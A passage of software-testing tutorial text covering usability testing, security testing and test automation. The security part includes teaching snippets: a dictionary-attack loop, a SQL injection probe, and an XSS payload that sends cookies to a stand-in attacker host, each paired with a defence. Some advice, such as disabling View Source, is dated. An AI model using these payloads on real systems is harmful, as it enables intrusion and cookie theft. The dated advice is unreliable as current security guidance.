Sit down with the team and agree on a test objective (something besides “determine whether users can use it”), the questions you’ll use, and characteristics of the people who will be trying out the design. (We call them participants, not subjects.) The plan also usually includes the methods and measures you’ll use to learn the answers to your research questions. It’s entirely possible to complete this discussion in under an hour. Write everything down and pick someone from the team to moderate the test sessions.

Choose a testing environment

Will you use a lab? If not, what’s the setup? Will you record the sessions? Again, the team should decide these things together. It’s good to include these logistics in the test plan.

Find and select participants

Focusing on the behavior you’re interested in observing is easier than trying to select for market segmentation or demographics. If you’re testing a web conferencing service, you want people who hold remote meetings. If you’re testing a hotel reservation process on a web site, you want people who do their own bookings. If you want to test a kiosk for checking people into and out of education programs, you want people who are attending those programs. Make sense? Don’t make recruiting harder than it has to be.


Prepare test materials

You’re going to want some kind of guide or checklist to make sure that the moderator addresses all of the research questions. This doesn’t mean asking the research questions of the participants; it means translating the research questions into task scenarios that represent realistic user goals.

In the test materials, include any specific interview questions you might want to ask, prompts for follow-up questions, as well as closing, debriefing questions that you want to ask each participant.

Conduct the sessions

The moderator is the master of ceremonies during each session. This person sees to the safety and comfort of the participants, manages the team members observing, and handles the data collected.

Though only one person from the team moderates, as many people from the team as possible should observe usability test sessions. If you’re going to do multiple individual sessions, each team member should watch at least two sessions.

Debrief with participants and observers

At the end of each session, be sure to take a step back with the participant and ask, “How’d that go?” Also, invite the trained observers to pass follow-up questions to the moderator or to ask questions themselves. Thank the participant, compensate him or her, and say good-bye.

Now, the team observing should talk briefly about what they saw and what they heard. (This discussion is not about solving design problems, yet.)

Analyze data and write up findings

What you know at the end of a usability test is what you observed: what your team saw and heard. When you look at those observations together, the weight of evidence helps you examine why particular things happened. From that examination, you can develop theories about the causes of frustrations and problems. After you generate these theories, team members can use their expertise to determine how to fix design problems. Then, you can implement changes and test your theories in another usability test.

What you get

If you follow this process in a linear way, you’ll end up with thorough planning, solid controls, heaps of data, rigorous analysis, and—finally—results. (As well as a lot of documentation.) It can feel like a big deal, and sometimes it should be.


But most real-world usability tests need to be lighter and faster. Some of the best user experience teams do only a few hours of testing every month or so, and they may not even think of it as “usability testing.” They’re “getting input” or “gathering feedback.”

Whatever. As long as it involves observing real people using your design, it’s usability testing.

Someone, something, someplace

Really, all you need for a usability test is someone who is a user of your design (or who acts like a user), something to test (a design in any state of completion), and someplace where the user and the design can meet and you can observe. Someplace can even be remote, depending on the state of the design. You can do all that fancy lab stuff, but you don’t have to.

Once you get into a rhythm of doing user research and usability testing, you’ll learn shortcuts and boil the process down to a few steps that work for you. When we get down to the essential steps in the usability testing process, this is what it tends to look like:

Develop a test plan

In the classic process, a usability test plan can be several pages long. Teams in the swing of doing testing all the time can work with a minimalist structure with one or two lines on the elements of the plan.

Find participants

Again, this is about behavior. If the behavior you're interested in for the study is, say, parents going through the process of getting their kids into college, recruit for exactly that. Just make sure you:

• Know your users
• Allow enough time
• Learn and be flexible
• Remember they’re human
• Compensate lavishly

Conduct the sessions

If you’re the moderator, do your best to be impartial and unbiased. Just be present and see what happens. Even the designer can moderate, provided you can step back and treat the test as an objective exercise.

Remember that this is not about teaching the participant how to use the interface. Give a task that realistically represents a user goal and let the rest happen. Just listen and watch. (Of course, if the task is something people are doing in real life and they’re having trouble in the session, show them the correct way to do the task with the current design after you’ve collected your data.)

As the session goes on, ask open-ended questions: Why? How? What?

Debrief with observers and come to consensus about design direction

Talk. Brainstorm. Agree. Unless the design was perfect going into the usability test (and that’s a rare thing) and even if the team has only done one or two sessions, use the observations you made to come up with theories about why things happened for participants the way they did. Make some changes and start the cycle again.

Where do great experience designs come from? Observing users

Getting input from users is great; knowing their requirements is important. Feedback from call centers and people doing support is also helpful in creating and improving designs. Whatever your team might call it—usability testing, design testing, getting feedback—the most effective input for informed design decisions is data about the behavior and performance of people using a design to reach their own goals.


Security testing

DEFINITION

Security Testing is a type of software testing that intends to uncover vulnerabilities of the system and determine that its data and resources are protected from possible intruders.

• It is a type of non-functional testing.
• Security testing is basically a type of software testing done to check whether the application or the product is secured or not. It checks whether the application is vulnerable to attacks and whether anyone can hack the system or log in to the application without authorization.

• It is a process to determine that an information system protects data and maintains functionality as intended.

• Security testing is also performed to check for information leakage, for example by encrypting the application's data and by using a wide range of software, hardware, and firewall protections.

• Software security is about making software behave correctly in the presence of a malicious attack.

• The six basic security concepts that need to be covered by security testing are: confidentiality, integrity, authentication, availability, authorization and non-repudiation.

What is Security Testing?

Security testing is a testing technique to determine if an information system protects data and maintains functionality as intended. It also aims at verifying 6 basic principles as listed below:

• Confidentiality
• Integrity
• Authentication
• Authorization
• Availability
• Non-repudiation

Security Testing - Techniques:

• Injection
• Broken Authentication and Session Management
• Cross-Site Scripting (XSS)
• Insecure Direct Object References
• Security Misconfiguration
• Sensitive Data Exposure
• Missing Function Level Access Control
• Cross-Site Request Forgery (CSRF)
• Using Components with Known Vulnerabilities
• Unvalidated Redirects and Forwards

FOCUS AREAS

There are four main focus areas to be considered in security testing (especially for web sites/applications):

• Network security: This involves looking for vulnerabilities in the network infrastructure (resources and policies).

• System software security: This involves assessing weaknesses in the various software (operating system, database system, and other software) the application depends on.

• Client-side application security: This deals with ensuring that the client (browser or any such tool) cannot be manipulated.

• Server-side application security: This involves making sure that the server code and its technologies are robust enough to fend off any intrusion.

Security testing is a process intended to reveal flaws in the security mechanisms of an information system that protect data and maintain functionality as intended. Due to the logical limitations of security testing, passing security testing is not an indication that no flaws exist or that the system adequately satisfies the security requirements.

Typical security requirements may include specific elements of confidentiality, integrity, authentication, availability, authorization, and non-repudiation. The actual security requirements tested depend on the security requirements implemented by the system. Security testing as a term has a number of different meanings and can be carried out in a number of different ways. As such, a security taxonomy helps us understand these different approaches and meanings by providing a base level to work from.

security concepts

Security Testing needs to cover the six basic security concepts: confidentiality, integrity, authentication, authorization, availability and non-repudiation.

Confidentiality

• A security measure which protects against the disclosure of information to parties other than the intended recipient. On its own, however, confidentiality is by no means the only measure needed to ensure security.


Integrity

• A measure intended to allow the receiver to determine that the information provided by a system is correct.

• Integrity schemes often use some of the same underlying technologies as confidentiality schemes, but they usually involve adding information to a communication to form the basis of an algorithmic check, rather than encoding all of the communication.

Authentication

This might involve confirming the identity of a person, tracing the origins of an artifact, ensuring that a product is what its packaging and labeling claims to be, or assuring that a computer program is a trusted one.

Authorization

• The process of determining that a requester is allowed to receive a service or perform an operation.

• Access control is an example of authorization.

Availability

• Assuring information and communications services will be ready for use when expected.

• Information must be kept available to authorized persons when they need it.

Non-repudiation

• In reference to digital security, nonrepudiation means to ensure that a transferred message has been sent and received by the parties claiming to have sent and received the message. Nonrepudiation is a way to guarantee that the sender of a message cannot later deny having sent the message and that the recipient cannot deny having received the message.

Security testing ensures that systems and applications in an organization are free from loopholes that may cause a big loss. Security testing of any system is about finding all possible loopholes and weaknesses of the system which might result in a loss of information at the hands of employees or outsiders of the organization.

• The goal of security testing is to identify the threats in the system and measure its potential vulnerabilities. It also helps in detecting all possible security risks in the system and helps developers fix these problems through coding.


Types of Security Testing:

There are seven main types of security testing, as per the Open Source Security Testing Methodology Manual. They are explained as follows:

• Vulnerability Scanning: This is done through automated software that scans a system against known vulnerability signatures.

• Security Scanning: This involves identifying network and system weaknesses and later provides solutions for reducing these risks. This scanning can be performed both manually and with automated tools.

• Penetration Testing: This kind of testing simulates an attack from a malicious hacker. It involves analysis of a particular system to check for potential vulnerabilities to an external hacking attempt.

• Risk Assessment: This testing involves analysis of the security risks observed in the organization. Risks are classified as Low, Medium, and High. This testing recommends controls and measures to reduce the risk.

• Security Auditing: This is an internal inspection of applications and operating systems for security flaws. An audit can also be done via line-by-line inspection of code.

• Ethical Hacking: This is hacking an organization's software systems. Unlike malicious hackers, who steal for their own gains, the intent is to expose security flaws in the system.

• Posture Assessment: This combines security scanning, ethical hacking, and risk assessment to show the overall security posture of an organization.


Integration of security processes with the SDLC:

It is generally agreed that cost will be higher if we postpone security testing until after the software implementation phase or after deployment. So it is necessary to involve security testing in the earlier phases of the SDLC.

Let's look at the corresponding security processes to be adopted for every phase of the SDLC.


Test plan should include

• Security-related test cases or scenarios
• Test data related to security testing
• Test tools required for security testing
• Analysis of the various test outputs from different security tools

Sample Test Scenarios for Security Testing:

Sample Test scenarios to give you a glimpse of security test cases -

• Passwords should be stored in encrypted format
• The application or system should not allow invalid users
• Check cookies and session time for the application
• For financial sites, the browser Back button should not work
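Scenarios like these lend themselves to automation. Below is a minimal sketch in Python using the requests library that checks the cookie and back-button scenarios; the URL, form field names, credentials, and the exact spelling of the HttpOnly attribute are hypothetical assumptions, not part of any particular system.

import requests

BASE = "https://app.example.com"  # hypothetical application under test

session = requests.Session()
session.post(f"{BASE}/login", data={"user": "alice", "password": "s3cret!"})

# Session cookies should be unreadable by script and never sent over plain HTTP.
for cookie in session.cookies:
    assert cookie.secure, f"cookie {cookie.name} is missing the Secure flag"
    assert cookie.has_nonstandard_attr("HttpOnly"), f"cookie {cookie.name} is missing HttpOnly"

# Sensitive pages should send Cache-Control: no-store, so the browser Back
# button cannot replay them after logout (the financial-site scenario above).
account = session.get(f"{BASE}/account")
assert "no-store" in account.headers.get("Cache-Control", "")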

Methodologies

In security testing, different methodologies are followed, and they are as follows:

• Tiger Box: This hacking is usually done on a laptop loaded with a collection of operating systems and hacking tools. This setup helps penetration testers and security testers conduct vulnerability assessments and attacks.

• Black Box: The tester is given no prior knowledge of the network topology or the technology; testing is performed from an outside attacker's perspective.

• Grey Box: Partial information about the system is given to the tester; it is a hybrid of the white box and black box models.

Roles you must know!

• Hackers - Access a computer system or network without authorization
• Crackers - Break into systems to steal or destroy data
• Ethical Hackers - Perform most of the same breaking activities, but with permission from the owner
• Script Kiddies or packet monkeys - Inexperienced hackers with limited programming skill

When do we use Security Testing?

Security testing is carried out when the information and assets managed by the software application are of significant importance to the organization. Failures in the software security system can be serious, especially when not detected, resulting in a loss or compromise of information without the knowledge of that loss. Security testing should be performed both before the system goes into operation and after the system is put into operation. Rigorous security testing activities are performed to demonstrate that the system meets the specified security requirements and to identify any remaining security vulnerabilities. The extent of testing largely depends upon the security risks, and the test engineers assigned to conduct the security testing are selected according to the estimated sophistication that might be used to penetrate the security.

What are the objectives of Security Testing?

Security defects do not surface as easily as other types of defects. Thus security testing is carried out to identify defects that are quite difficult to find. Security testing also ensures that the software under test is sufficiently robust and functions in an acceptable manner even in the event of a malicious attack. The objectives of security testing can be:

1) To ensure that adequate attention is paid to identifying the security risks
2) To ensure that a realistic mechanism to define and enforce access to the system is in place
3) To ensure that sufficient expertise exists to perform adequate security testing
4) To conduct reasonable tests to confirm the proper functioning of the implemented security measures

Who should do the Security Testing?

The majority of security testing techniques are manual, requiring an individual to initiate and conduct the test. Automation tools can be helpful in executing simple tasks, whereas complicated tasks continue to depend largely on the intelligence of the test engineer. Irrespective of the type of testing, the test engineers who plan and conduct security testing should have significant security and networking knowledge, including expertise in the following areas:

1) Network security
2) Firewalls
3) Intrusion detection systems
4) Operating systems
5) Programming and networking protocols such as TCP/IP

Security Testing versus Conventional Software Testing

Security testing has the following attributes:

• It emphasizes what an application should not do rather than what it should do.
• It sometimes tests conformance to positive requirements, for instance "User accounts are disabled after five unsuccessful login attempts."
• It is aimed at testing negative requirements, stating something that should never occur. For example, "An external attacker should not be able to modify the contents of the Web page" and "Unauthorized users should not be able to access the data."

Methods of Security Testing:

To confirm whether a particular software application meets its security requirements, the following two methods of testing are usually adopted:

1) Functional security testing: This is meant to ensure that the software behaves according to the specified functional requirements and is expected to demonstrate that the specified requirements are satisfied at an acceptable level. Functional requirements generally have a form like "When a certain thing takes place, then the software must respond in a particular way."

2) Risk-based security testing: The first step in risk-based testing is the identification of the security risks and the potential loss associated with those risks. It tries to confirm the software's immunity against specific risks that have been identified through the risk analysis effort. Risk-based testing addresses negative requirements, which state what a software system should not do. Tests for negative requirements are derived from a risk analysis and generally cover not only the high-level risks identified during the design process but also low-level risks derived from the software itself.

Test Cases for Security Testing:

1. Try to directly access a bookmarked web page without logging in to the system.

2. Verify that the system restricts you from downloading a file without signing in to the system.

3. Verify that previously accessed pages are not accessible after logging out, i.e., sign out and then press the Back button to try to reach a page accessed earlier.

4. Check valid and invalid passwords against the password rules, e.g., the password cannot be fewer than 6 characters, the user ID and password cannot be the same, etc.

5. Verify that sensitive information such as passwords, ID numbers, credit card numbers, etc. is not displayed in the input box when typing. It should be masked with asterisks and encrypted.

6. Check whether bookmarking is disabled on secure pages. Bookmarking should be disabled on secure pages.

7. Check whether Right Click > View Source is disabled. Source code should not be visible to the user.


8. Check whether there is an alternative way to access secure pages for browsers under version 3.0, since SSL is not compatible with those browsers.

9. Check whether the server locks out an individual who has tried to access the site multiple times with invalid login/password information.

10. Verify the timeout condition; after a timeout, the user should not be able to navigate through the site.

11. Check that you are prevented from performing direct searches by editing content in the URL.

12. Verify that relevant information is written to the log files and that the information is traceable.

13. For SSL, verify that the encryption is done correctly and check the integrity of the information.

14. Verify that restricted pages are not accessible by the user after the session times out.

15. For ID/password authentication, the same account on different machines should not be able to log on at the same time, so that only one user at a time can log in to the system with a given user ID.

16. For ID/password authentication, enter the wrong password several times and check whether the account gets locked.

17. Add or modify important information (passwords, ID numbers, credit card numbers, etc.). Check whether it is reflected immediately or whether the old values are still cached.

18. Verify that error messages do not contain information a hacker could use to attack the web site.
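Many of these cases are easy to automate and re-run on every build. As one hedged illustration, here is a sketch of case 16 (account lockout) using Python's requests library; the endpoint, field names, lockout threshold, and status codes are assumptions about a hypothetical application.

import requests

BASE = "https://app.example.com"   # hypothetical system under test
LOCKOUT_THRESHOLD = 5              # assumed policy: lock after 5 failures

for attempt in range(LOCKOUT_THRESHOLD):
    r = requests.post(f"{BASE}/login", data={"user": "alice", "password": "wrong"})
    assert r.status_code in (401, 403), "invalid credentials must be rejected"

# The next attempt -- even with the correct password -- should now be refused,
# because the account is locked.
r = requests.post(f"{BASE}/login", data={"user": "alice", "password": "s3cret!"})
assert r.status_code in (401, 403, 423), "account was not locked out"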

Some key terms used in security testing

Before we go further, it will be useful to be aware of a few terms that are frequently used in web application security testing:

What is “Vulnerability”?
This is a weakness in the web application. The cause of such a “weakness” can be bugs in the application, an injection (SQL/script code), or the presence of viruses.

What is “URL manipulation”?
Some web applications communicate additional information between the client (browser) and the server in the URL. Changing some information in the URL may sometimes lead to unintended behavior by the server.


What is “SQL injection”? This is the process of inserting SQL statements through the web application user interface into some query that is then executed by the server.

What is “XSS (Cross Site Scripting)”? When a user inserts HTML/client-side script in the user interface of a web application and this insertion is visible to other users, it is called XSS.

What is “Spoofing”? The creation of hoax look-alike websites or emails is called spoofing.

Security testing approach:

In order to perform a useful security test of a web application, the security tester should have good knowledge of the HTTP protocol. It is important to have an understanding of how the client (browser) and the server communicate using HTTP. Additionally, the tester should at least know the basics of SQL injection and XSS. Hopefully, the number of security defects present in the web application will not be high. However, being able to accurately describe the security defects with all the required details to all concerned will definitely help.

How to prepare and plan for Security Testing

Let's discuss the steps to follow while preparing and planning for security testing:

• The first step is to understand the business requirements and the security goals and objectives in terms of the security compliance of the organization. The test planning should consider all security factors, e.g., the organization might have planned to achieve PCI compliance.
• Understand and analyze the requirements of the application under test.
• Collect all system setup information used for the development of the software and network, such as operating systems, technology, and hardware.
• Make a list of vulnerabilities and security risks.
• Based on the above step, prepare a threat profile.
• Based on the identified threats, vulnerabilities, and security risks, prepare a test plan to address these issues.
• For each identified threat, vulnerability, and security risk, prepare a traceability matrix.
• Not all security testing can be executed manually, so identify tools to execute all the security test cases faster and more reliably.
• Prepare the security test case document.
• Perform the security test case execution and retest the defect fixes.
• Execute the regression test cases.
• Prepare a detailed report of the security testing, containing the vulnerabilities and threats found, detailed risks, and still-open issues.

6 basic terms used in Security Testing

Here are some useful terms frequently used in security testing:

1) What is “Penetration Testing”?

Penetration testing is a type of security testing that identifies security vulnerabilities in an application by evaluating the system or network with various malicious techniques. The main purpose of this testing is to protect the identified vulnerabilities and to secure important data from unknown users who do not have access to the system, such as hackers. Penetration testing should be carried out only after cautious consideration, notification, and planning.

There are two types of penetration testing: white box testing and black box testing. In white box testing, all information is available to the tester before testing starts, such as IP addresses, code, and infrastructure diagrams, and the tester performs the testing based on the available information. In black box testing, the tester has no information about the system under test. This is the more realistic testing method, as it simulates real hackers, who do not have information about the existing system.

2) Password cracking:

In security testing of a web application, password-cracking programs can be used to identify weak passwords. Cracking can start with guesses of common usernames and passwords or with the use of a password-cracking tool. Password cracking confirms whether users are making use of adequately strong passwords.

In most systems, passwords are stored in an encrypted format such as a hash. When a user tries to log in with their credentials, a hash is created for the newly entered password and compared with the originally stored hash; if the hashes match, the user is authenticated. An automated password cracker essentially generates candidate hashes until a match is found. The most commonly used password-cracking technique is the dictionary attack, in which an automated tool tries every word from a dictionary.

Cracking is easier if the system does not enforce complex password rules, such as requiring at least one digit, one letter, and one special character. Sometimes passwords are stored in cookies; if such login credentials are stored in cookies without encryption, a hacker can use various methods to obtain the username and password.
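To make the mechanics concrete, here is a toy dictionary attack in Python against a single unsalted SHA-256 hash. The hash, scheme, and word list are deliberately simplistic illustrations; real crackers use large word lists, mutation rules, and GPU acceleration, and real systems should use salted, slow hashes such as bcrypt.

import hashlib

stored_hash = hashlib.sha256(b"sunshine").hexdigest()  # the "leaked" hash
wordlist = ["password", "123456", "qwerty", "sunshine", "letmein"]

for candidate in wordlist:
    # Hash each dictionary word and compare it with the stored hash.
    if hashlib.sha256(candidate.encode()).hexdigest() == stored_hash:
        print(f"password recovered: {candidate}")
        break
else:
    print("no dictionary word matched")

Because the weak password appears in the dictionary, it falls on the fourth guess; a per-user salt would at least force the attacker to redo this work for every account.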

3) What is “Vulnerability”?

A vulnerability is a weakness in the system under test which may allow malicious attacks by unauthorized users. Vulnerabilities can increase due to bugs in the software, a lack of security testing, viruses, etc. These security vulnerabilities require patches, or fixes, in order to prevent the potential for compromised integrity by hackers or malware.

4) What is “URL manipulation”?

URL manipulation is a very common and interesting type of attack used by hackers. In this attack, the hacker manipulates the query string of the website URL to capture important information.

This happens when the application uses the HTTP GET method to pass information between the client and the server. The information is passed in parameters in the query string. The tester can modify a parameter value in the query string to check whether the server accepts it.

Via an HTTP GET request, user information is passed to the server for authentication or for fetching data. An attacker can manipulate every input variable passed in this GET request to the server in order to get the required information or to corrupt the data. In such conditions, any unusual behavior by the application or web server is a doorway for the attacker to get into the application.

Security testing should therefore include URL-manipulation test cases to make sure that an unauthorized user cannot access important information or corrupt database records through URL manipulation.
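A minimal sketch of such a test case, assuming a hypothetical endpoint that takes an account id in the query string: log in as one user, then tamper with the parameter and confirm the server refuses to serve another user's data. All URLs, parameters, and credentials below are illustrative assumptions.

import requests

BASE = "https://app.example.com"  # hypothetical application under test

session = requests.Session()
session.post(f"{BASE}/login", data={"user": "alice", "password": "s3cret!"})

# Alice's own statement should be served normally.
own = session.get(f"{BASE}/statement", params={"account_id": "1001"})
assert own.status_code == 200

# Tampered query string: Alice must NOT be able to read account 1002.
other = session.get(f"{BASE}/statement", params={"account_id": "1002"})
assert other.status_code in (401, 403), "server accepted a manipulated URL"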

5) What is “SQL injection”?

SQL injection is one of the most common application-layer attack techniques used by hackers, and one of several web attack mechanisms used to steal data from organizations. SQL injection attacks are critical because the attacker can obtain vital information from the server database. This type of attack takes advantage of loopholes in the implementation of a web application, for example by passing SQL fragments into input fields in an attempt to compromise the system.


Hackers try to query the database by supplying SQL injection statements, or fragments of SQL statements, as user input in order to pull vital information out of the system or crash it; even the error displayed in the browser can give them the information they are looking for.

To check for SQL injection, we have to take care of input fields such as text boxes, comment fields, etc. Special characters should be either properly handled (escaped) or rejected from the input.
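The root cause and the standard fix can be shown in a few lines. The sketch below uses Python's built-in sqlite3 module: the first query is assembled by string concatenation and is injectable, while the second binds the same input as a parameter, so the payload is treated as data rather than SQL.

import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, secret TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 'top-secret')")

payload = "' OR '1'='1"  # classic probe typed into an input field

# VULNERABLE: the payload rewrites the WHERE clause and every row comes back.
rows = conn.execute("SELECT * FROM users WHERE name = '" + payload + "'").fetchall()
print("concatenated query leaked:", rows)

# SAFE: the placeholder binds the payload as a literal value; nothing matches.
rows = conn.execute("SELECT * FROM users WHERE name = ?", (payload,)).fetchall()
print("parameterized query returned:", rows)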

6) Cross Site Scripting (XSS)

Cross-site scripting (also known as XSS) is a type of computer security vulnerability typically found in web applications, and one of the most common application-layer hacking techniques. It is a vulnerability in a web application that allows an attacker to inject HTML and JavaScript code into a web page. These attacks inject malicious scripts into victims' web browsers, where the scripts can be used to steal vital information stored in cookies.
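The defense testers look for is output encoding: anything untrusted must be HTML-escaped before being echoed into a page. A minimal Python illustration, using a made-up cookie-stealing payload:

from html import escape

payload = "<script>document.location='http://evil.example/?c='+document.cookie</script>"

unsafe_page = f"<p>Hello {payload}</p>"        # reflected verbatim: exploitable
safe_page = f"<p>Hello {escape(payload)}</p>"  # angle brackets become entities: inert

assert "<script>" in unsafe_page
assert "<script>" not in safe_page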


Test automation

What is Automation Testing

Using Automation tools to write and execute test cases is known as automation testing. No manual intervention is required while executing an automated test suite.

Testers write test scripts and test cases using the automation tool and then group them into test suites.

Benefits of Automation Testing

• Reduction of repetitive work
• Repeatability
• Greater consistency
• Ease of access to information about tests or testing

Automation testing

Automation testing, also known as test automation, is when the tester writes scripts and uses separate software to test the software under test. This process involves the automation of a manual process. Automation testing is used to re-run, quickly and repeatedly, test scenarios that were previously performed manually.

Apart from regression testing, automation testing is also used to test the application from the load, performance, and stress points of view. It increases test coverage, improves accuracy, and saves time and money in comparison to manual testing.


What to automate?

It is not possible to automate everything in the software; however, areas where users perform transactions, such as login or registration forms, and any area that large numbers of users can access simultaneously, should be automated.

Furthermore, GUI items, connections with databases, field validations, etc. can be efficiently tested by automating the manual process.

When to automate?

Test automation should be used after considering the following aspects of the software:

• Large and critical projects
• Projects that require testing the same areas frequently
• Requirements that do not change frequently
• Accessing the application for load and performance testing with many virtual users
• Software that is stable with respect to manual testing
• Availability of time

How to automate?

Automation is done by using a supporting scripting language, such as VBScript, and an automated software application. There are many tools available that can be used to write automation scripts. Before mentioning the tools, let's identify the process that can be used to automate the testing:

• Identifying areas within the software for automation
• Selecting the appropriate tool for test automation
• Writing test scripts
• Developing test suites
• Executing the scripts
• Creating result reports
• Identifying any potential bugs or performance issues

In software testing, test automation is the use of special software (separate from the software being tested) to control the execution of tests and the comparison of actual outcomes with predicted outcomes. Test automation can automate some repetitive but necessary tasks in a formalized testing process already in place, or add additional testing that would be difficult to perform manually.

There are many approaches to test automation; the general approaches below are the most widely used:


• Code-driven testing. The public (usually) interfaces to classes, modules or libraries are tested with a variety of input arguments to validate that the results that are returned are correct.

• Graphical user interface testing. A testing framework generates user interface events such as keystrokes and mouse clicks, and observes the changes that result in the user interface, to validate that the observable behavior of the program is correct.

• API driven testing. A testing framework that uses the programming interface of the application to validate the behaviour under test. Typically API driven testing bypasses the application user interface altogether.

Code-driven testing

A growing trend in software development is the use of testing frameworks such as the xUnit frameworks (for example, JUnit and NUnit) that allow the execution of unit tests to determine whether various sections of the code are acting as expected under various circumstances. Test cases describe tests that need to be run on the program to verify that the program runs as expected.

Code-driven test automation is a key feature of agile software development, where it is known as test-driven development (TDD). Unit tests are written to define the functionality before the code is written. However, these unit tests evolve and are extended as coding progresses, issues are discovered, and the code is subjected to refactoring. Only when all the tests for all the demanded features pass is the code considered complete. Proponents argue that it produces software that is both more reliable and less costly than code that is tested by manual exploration. It is considered more reliable because the code coverage is better, and because it is run constantly during development rather than once at the end of a waterfall development cycle. The developer discovers defects immediately upon making a change, when it is least expensive to fix. Finally, code refactoring is safer; transforming the code into a simpler form with less code duplication, but equivalent behavior, is much less likely to introduce new defects.
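As a concrete (if tiny) example of the xUnit style, here is a self-contained test class using Python's built-in unittest module; the discount function is a made-up stand-in for whatever unit is under test.

import unittest

def discount(price, percent):
    """Unit under test: apply a percentage discount."""
    if not 0 <= percent <= 100:
        raise ValueError("percent must be between 0 and 100")
    return round(price * (1 - percent / 100), 2)

class DiscountTest(unittest.TestCase):
    def test_typical_discount(self):
        self.assertEqual(discount(200.0, 25), 150.0)

    def test_zero_discount_returns_price(self):
        self.assertEqual(discount(99.99, 0), 99.99)

    def test_invalid_percent_is_rejected(self):
        with self.assertRaises(ValueError):
            discount(100.0, 150)

if __name__ == "__main__":
    unittest.main()

In TDD these tests would be written first, fail, and then drive the implementation until they pass.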

Graphical User Interface (GUI) testing

Many test automation tools provide record and playback features that allow users to interactively record user actions and replay them back any number of times, comparing actual results to those expected. The advantage of this approach is that it requires little or no software development. This approach can be applied to any application that has a graphical user interface. However, reliance on these features poses major reliability and maintainability problems. Relabelling a button or moving it to another part of the window may require the test to be re-recorded. Record and playback also often adds irrelevant activities or incorrectly records some activities.

A variation on this type of tool is for testing of web sites. Here, the "interface" is the web page. This type of tool also requires little or no software development. However, such a framework utilizes entirely different techniques because it is reading HTML instead of observing window events.

Another variation is scriptless test automation, which does not use record and playback but instead builds a model of the Application Under Test (AUT) and then enables the tester to create test cases by simply editing test parameters and conditions. This requires no scripting skills, but offers much of the power and flexibility of a scripted approach. Test-case maintenance appears easy, as there is no code to maintain, and as the AUT changes the software objects can simply be re-learned or added. It can be applied to any GUI-based software application. The problem is that the model of the AUT is in fact implemented using test scripts, which have to be constantly maintained whenever the AUT changes.
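For comparison with record and playback, here is a hedged sketch of a scripted GUI test using Selenium WebDriver, one widely used web-testing framework; the URL and element ids are hypothetical. Locating elements by id rather than screen position is what gives scripted tests some resilience to the relabelling and moving problems noted above.

from selenium import webdriver
from selenium.webdriver.common.by import By

driver = webdriver.Chrome()  # assumes a local Chrome installation
try:
    driver.get("https://app.example.com/login")
    driver.find_element(By.ID, "username").send_keys("alice")
    driver.find_element(By.ID, "password").send_keys("s3cret!")
    driver.find_element(By.ID, "submit").click()
    # Assert on the observable result, just as a human observer would.
    assert "Welcome" in driver.find_element(By.TAG_NAME, "h1").text
finally:
    driver.quit()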

API driven testing

API driven testing is also being widely used by software testers as it's becoming tricky to create and maintain GUI-based automation testing.

Programmers or testers write scripts using a programming or scripting language that calls the interface exposed by the application under test. These interfaces are custom-built or commonly available interfaces such as COM, HTTP, or the command line. The test scripts are executed using an automation framework or a programming language, and the test results are compared with the expected behaviour of the application.
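A small sketch of the idea over HTTP, using Python's requests library against a hypothetical REST endpoint: the GUI is bypassed entirely and behavior is verified through the application's programming interface.

import requests

BASE = "https://api.example.com"  # hypothetical API under test

# Create a resource through the public API...
created = requests.post(f"{BASE}/orders", json={"item": "widget", "qty": 3})
assert created.status_code == 201
order_id = created.json()["id"]

# ...then verify the behavior under test by reading it back.
fetched = requests.get(f"{BASE}/orders/{order_id}")
assert fetched.status_code == 200
assert fetched.json()["qty"] == 3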

Test automation interface

Test automation interfaces are platforms that provide a single workspace for incorporating multiple testing tools and frameworks for system/integration testing of the application under test. The goal of a test automation interface is to simplify the process of mapping tests to business criteria without coding getting in the way of the process. Test automation interfaces are expected to improve the efficiency and flexibility of maintaining test scripts.

Test Automation Interface Model

Test Automation Interface consists of the following core modules:

• Interface Engine
• Interface Environment
• Object Repository

Interface engine

Interface engines are built on top of the interface environment. An interface engine consists of a parser and a test runner. The parser parses the object files coming from the object repository into the test-specific scripting language. The test runner executes the test scripts using a test harness.
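Purely as a schematic illustration of those two parts, the toy Python below "parses" object-repository records into executable steps and "runs" them through a stand-in harness; real interface engines are, of course, far richer, and every name here is invented for illustration.

# Hypothetical object-repository records (normally produced by the test tool).
object_repository = {
    "user_field": {"locator": "id=username", "action": "type", "value": "alice"},
    "login_button": {"locator": "id=submit", "action": "click"},
}

def parse(name):
    """Parser: translate a repository record into an executable step."""
    record = object_repository[name]
    return (record["action"], record["locator"], record.get("value"))

def run(step):
    """Test runner: a stand-in harness that just logs what a driver would do."""
    action, locator, value = step
    print(f"{action} on {locator}" + (f" with '{value}'" if value else ""))

for widget in ("user_field", "login_button"):
    run(parse(widget))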

Interface environment

The interface environment consists of a Product/Project Library and a Framework Library. The Framework Library has modules related to the overall test suite, while the Product/Project Library has modules specific to the application under test.

Object repository

Object repositories are collections of UI/application object data recorded by the testing tool while exploring the application under test.

Why automate Testing?

In today's fast-moving world, it is a challenge for any company to continuously maintain and improve the quality and efficiency of software systems development. In many software projects, testing is neglected because of time or cost constraints. This leads to a lack of product quality, followed by customer dissatisfaction and ultimately increased overall quality costs.

The main reasons for these added costs are primarily poor test strategy, underestimated effort of test case generation, delay in testing, and subsequent test maintenance.

Test automation can improve the development process of a software product in many cases. The automation of tests is initially associated with increased effort, but the related benefits will quickly pay off.

Automated tests can run fast and frequently, which is cost-effective for software products with a long maintenance life. When testing in an agile environment, the ability to quickly react to ever-changing software systems and requirements is necessary. New test cases are generated continuously and can be added to existing automation in parallel to the development of the software itself.

In both manual and automated testing environments test cases need to be modified for extended periods of time as the software project progresses. It is important to be aware that complete coverage of all tests using test automation is unrealistic. When deciding what tests to automate first, their value vs. the effort to create them needs to be considered. Test cases with high value and low effort should be automated first. Subsequently test cases with frequent use, changes, and past errors; as well as test cases with low to moderate effort in setting up the test environment and developing the automation project are best suited for automation.

Automated testing is important for the following reasons:


• Manual testing of all workflows, all fields, and all negative scenarios is time and cost consuming.
• It is difficult to test multilingual sites manually.
• Automation does not require human intervention; you can run automated tests unattended (overnight).
• Automation increases the speed of test execution.
• Automation helps increase test coverage.
• Manual testing can become boring and hence error prone.

Which Test Cases to Automate?

Test cases to be automated can be selected using the following criteria to increase the automation ROI:

• High-risk, business-critical test cases
• Test cases that are executed repeatedly
• Test cases that are very tedious or difficult to perform manually
• Test cases which are time consuming

The following categories of test cases are not suitable for automation:

• Test cases that are newly designed and not executed manually at least once
• Test cases for which the requirements change frequently
